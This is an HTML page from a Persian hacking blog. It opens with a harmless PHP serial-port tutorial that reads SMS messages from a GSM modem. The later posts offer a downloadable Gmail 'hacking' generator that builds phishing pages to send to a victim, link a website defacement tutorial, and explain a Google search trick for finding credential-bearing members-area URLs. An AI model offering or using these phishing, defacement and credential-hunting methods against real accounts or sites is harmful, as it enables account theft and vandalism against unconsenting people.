<P align=right>· Support for Unicode</P>
<P align=right>· Support for PHP 5</P>
<P align=right>· Performance statistics: </P>
<P align=right>o mysqli_get_client_stats()</P>
<P align=right>o mysqli_get_connection_stats()</P>
<P align=right>از اينجا دانلود كنيد .<BR>آخرين بروز رساني ( ۲۳ فروردین ۱۳۸۶ ) <BR> <BR>PHP serial extension <BR>نوشته شده توسط HamidReza <BR>۲۱ فروردین ۱۳۸۶ </P>
<P align=right>اين جور كه پيداست به هيچ وجه نميشه آينده php رو پيش بيني كرد . هر روز اكستنشن هاي جديدي براي php نوشته ميشه كه باعث بالا رفتن توانايي هاي اون ميشه .</P>
<P align=right>چند روز پيش يك اكستنشن جالبي رو ديدم كه به نظرم مطرح كردن اون خالي از لطف نبود :</P>
<P align=right>PHP serial extension</P>
<P align=right>زماني كه php با اين اكستنشن بر روي ويندوز نصب باشه با نوشتن اسكريپت مي تونيد با سخت افزارهايي كه بوسيله پورت سريال به آن كامپيوتر متصل هستند دسترسي داشته باشيد . ممكنه بپرسيد اين چه فايده اي داره ؟</P>
<P align=right>فايده اون اينه كه از راه دور و با لاگين كردن از هرجاي دنيا ميتونيد سخت افزار متصل شده رو كنترل كنيد !</P>
<P align=right>اين سخت افزار ميتونه هر چيزي باشه از سوييچر ويديويي ‘ جعبه هاي كنترل منزل ‘ كنترل كننده هاي دوربين و حتي مودم هاي GSM كه به منظور ارسال و دريافت SMS كاربرد دارند .</P>
<P align=right> </P>
<P align=right> </P>
<P align=right>سيستم عامل مورد نياز متاسفانه فقط ويندوز هست از نسخه هاي 95 تا XP البته لينوكسي ها اصلا نگران نباشند چون يه چيزي تو همين مايه ها براي سيستم عامل لينوكس وجود داره كه فكر كنم فقط يك كلاس هست و نياز به اكستنشن هم نداره :PHP serial</P>
<P align=right> </P>
<P align=right>در ادامه يك نمونه كدنويسي براي ليست كردن SMS هاي يك مودم ي ا تلفن GSM رو بررسي ميكنيم :</P>
<P align=right> </P>
<P align=right>در ابتدا ميتونيد نسخه ورژن اكستنشن رو بدين صورت بازيابي كنيد :</P>
<P align=right>$str = ser_version();<BR>echo "Version: $str";</P>
<P align=right>خروجي اين كد چيزي شبيه به اين 10032006.1. است .</P>
<P align=right>گام بعدي بازكردن پورت هست :</P>
<P align=right>ser_open( "COM1", 9600, 8, "None", 1, "None" );</P>
<P align=right>براي اينكه مطمئن باشيد پورت در حال حاضر باز است بدين ترتيب عمل ميكنيم :</P>
<P align=right>$str = ser_isopen();<BR>echo "Port: $str";</P>
<P align=right>كه خروجي به اين Port: COM1 9600 8 None 1 None شكا خواهد بود .</P>
<P align=right>بعضي از مودم ها نياز دارند كه DTR آنها هم ست شود :</P>
<P align=right>ser_setDTR( True );</P>
<P align=right>براي كار كردن با SMS ها در محيط متني عمل ميكنيم . اين كار رو با دستور AT+CMGF ست ميكنيم :</P>
<P align=right>ser_write("AT+CMGF=1\r\n");</P>
<P align=right>تمام دستورات مقداري رو بر ميگردانند . مانند ok يا error . ما اين پيامها رو دريافت ميكنيم و در خروجي مياوريم :</P>
<P align=right>sleep(1); // wait a while<BR>$str = ser_read(128);<BR>echo $str;</P>
<P align=right>كه بايد خروجي OK رو بدهد .</P>
<P align=right>در اين لحظه همه چيز آماده هست تا SMS ها رو ليست كنيم با دستور AT+CMGL .</P>
<P align=right>ser_write("AT+CMGL=\"ALL\"\r\n");</P>
<P align=right>مودم در پاسخ اين درخواست ليست تمام SMS هاي موجود در حافظه و يا sim كارت خود را جواب ميدهد .</P>
<P align=right>sleep(2); // wait a while, if list is long we must wait longer<BR>$str = ser_read(512);<BR>echo $str;</P>
<P align=right>در اين لحظه ما خروجي SMS هاي يك مودم يا تلفن GSM رو بر روي يك صفحه وب داريم !</P>
<P align=right>لينكها :</P>
<P align=right><BR>راهنما</P>
<P align=right><A href="http://www.easyvitools.com/phpserial/php_ser_reference.html">http://www.easyvitools.com/phpserial/php_ser_reference.html</A></P>
<P align=right> </P>
<P align=right>دانلود</P>
<P align=right> </P>
<P align=right><A href="http://www.easyvitools.com/download/download.html">http://www.easyvitools.com/download/download.html</A></P>
<P align=right> </P>
<P align=center><IMG height=18 src="http://blogfa.com/images/smileys/07.gif" width=18> نظر ندیا!!!!!!!!!!!!!!!<IMG height=18 src="http://blogfa.com/images/smileys/17.gif" width=18></P>
<P align=center> </P>
<P align=right> </P>
<P align=right> </P></LI><LI><a href="http://zer0-0ne.blogfa.com/post-111.aspx" target="_blank">اینم یه نمونه عکس برا دیدن دی فیس</a><BR><P align=center><IMG alt="برا رفع خستگی" hspace=0 src="http://gfx.download-by.net/screen/98/98123-hack-the-universe.jpg" align=baseline border=5></P>
<P align=center>zer0-0ne.blogfa.com</P>
<P align=center>khubi ha ro faramush nakon...</P></LI><LI><a href="http://zer0-0ne.blogfa.com/post-110.aspx" target="_blank">هک جی میل</a><BR>سلام <BR>يه برنامه براتون ميزارم كه در هك جي ميل استفاده ميشه بدين صورت كه در كادر بالاي برنامه gmail كسي كه مي خواهيد هك بشه رو مي نويسيد و در پايين ايميل خودتون بعد گزينه generate رو بزنيد بعد برنامه واسه شما دو تا فايل كه يكيش php و يكيش html هست درست ميكنه كه شما بايد اينارو در يه هاست قرار بدين و او لينك html رو به طرف بدين و .....<BR>خودتون اگه فايل htm رو ببينيد متوجه ميشيد قضيه چيه </P>
<P> <A href="http://www.sagaposes.com/sina/GmailGen.zip">http://www.sagaposes.com/sina/GmailGen.zip</A></P>
<P> </P>
<P>ای بابا اگه موظوع س ک س ی بود که ۱۰۰ انتقادو پیشنهاد داشتی ......</P>
<P>باشه</P>
<P>؟<IMG height=18 src="http://blogfa.com/images/smileys/07.gif" width=18></P></LI><LI><a href="http://zer0-0ne.blogfa.com/post-109.aspx" target="_blank">آموزش دیفیس سایت</a><BR> </P>
<P>یه ویدیو واستون آپلود کردم آموزش دیفیس سایت البته مثه یه بازیه لینکش : </P>
<P><A href="http://www.irshare.com/file.php?file=156d0887d4703b4925528dc99f03c4b0">http://www.irshare.com/file.php?file=156d0887d4703b4925528dc99f03c4b0</A></P>
<P> </P>
<P> </P></LI><LI><a href="http://zer0-0ne.blogfa.com/post-108.aspx" target="_blank">هک اما بی هک</a><BR>این آموزش واسه بچه های زیر 18 مناسب نیست ! </P>
<P>به این دستور زیر توجه کنید :</P>
<P><A href="http://*:*@members.examplesite.domain">http://*:*@members.examplesite.domain</A></P>
<P>بجای examplesite آدرس سایت مورد نظر رو بزارید<BR>بجای .domain هم پسوند سایت رو بزارید ، مثلا .com</P>
<P>بعد این آدرسی رو که ساختید رو تو گوگل سرچ کنید !</P>
<P>نتیجه رو ببینید ! به نظر باور نکردنی میاد نه ؟ </P></LI></UL> </div>
<a href="http://coo.ir/directory.php">ثبت دامین</a>
</body>